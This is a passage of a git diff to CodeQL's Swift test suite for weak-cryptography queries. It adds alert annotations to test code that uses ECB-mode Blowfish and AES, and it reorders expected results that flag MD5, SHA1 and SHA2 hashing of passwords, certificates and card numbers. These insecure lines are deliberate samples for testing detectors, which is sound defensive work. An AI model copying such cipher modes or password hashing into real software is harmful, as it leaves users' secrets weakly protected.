ab6 = AES(key: key, blockMode: getECBBlockMode()) // BAD // $ Alert let ag1 = AES(key: key, blockMode: cbc, padding: padding) // GOOD let ag2 = AES(key: key, blockMode: cbc) // GOOD @@ -68,9 +68,9 @@ func test1() { let ag6 = AES(key: key, blockMode: getCBCBlockMode()) // GOOD // Blowfish test cases - let bb1 = Blowfish(key: key, blockMode: ecb, padding: padding) // BAD - let bb2 = Blowfish(key: key, blockMode: ECB(), padding: padding) // BAD - let bb3 = Blowfish(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD + let bb1 = Blowfish(key: key, blockMode: ecb, padding: padding) // BAD // $ Alert + let bb2 = Blowfish(key: key, blockMode: ECB(), padding: padding) // BAD // $ Alert + let bb3 = Blowfish(key: key, blockMode: getECBBlockMode(), padding: padding) // BAD // $ Alert let bg1 = Blowfish(key: key, blockMode: cbc, padding: padding) // GOOD let bg2 = Blowfish(key: key, blockMode: CBC(iv: iv), padding: padding) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected index 273f26164fd7..2b0eed8d0c2b 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected @@ -1,3 +1,52 @@ +#select +| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | +| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | +| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | +| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | +| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | +| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | +| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | +| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | +| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | +| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | +| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | +| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | +| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | +| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | +| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | +| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | +| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | +| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | +| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | +| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | +| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | +| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | +| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | +| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | +| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | +| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | +| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | +| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | +| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | edges | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:38:224:53 | .utf8 | provenance | | | testCryptoKit.swift:224:38:224:53 | .utf8 | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | provenance | | @@ -53,52 +102,3 @@ nodes | testCryptoSwift.swift:228:9:228:9 | passwd | semmle.label | passwd | | testCryptoSwift.swift:231:9:231:9 | passwd | semmle.label | passwd | subpaths -#select -| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | -| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | -| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | -| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | -| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | -| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | -| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | -| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | -| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | -| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | -| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | -| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | -| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | -| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | -| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | -| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | -| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | -| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | -| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | -| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | -| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | -| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | -| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | -| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | -| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | -| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | -| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | -| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | -| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref index b2cfaab1f5cc..24744b4a4250 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.qlref @@ -1 +1,2 @@ -queries/Security/CWE-328/WeakPasswordHashing.ql +query: queries/Security/CWE-328/WeakPasswordHashing.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected index ebb8154b0f8e..67c2e2f49302 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected @@ -1,3 +1,40 @@ +#select +| testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | testCryptoKit.swift:86:43:86:43 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:86:43:86:43 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | testCryptoKit.swift:88:43:88:43 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:88:43:88:43 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | testCryptoKit.swift:89:43:89:43 | credit_card_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:89:43:89:43 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | testCryptoKit.swift:93:36:93:36 | cert | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:93:36:93:36 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | testCryptoKit.swift:95:36:95:36 | account_no | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:95:36:95:36 | account_no | sensitive data (private information 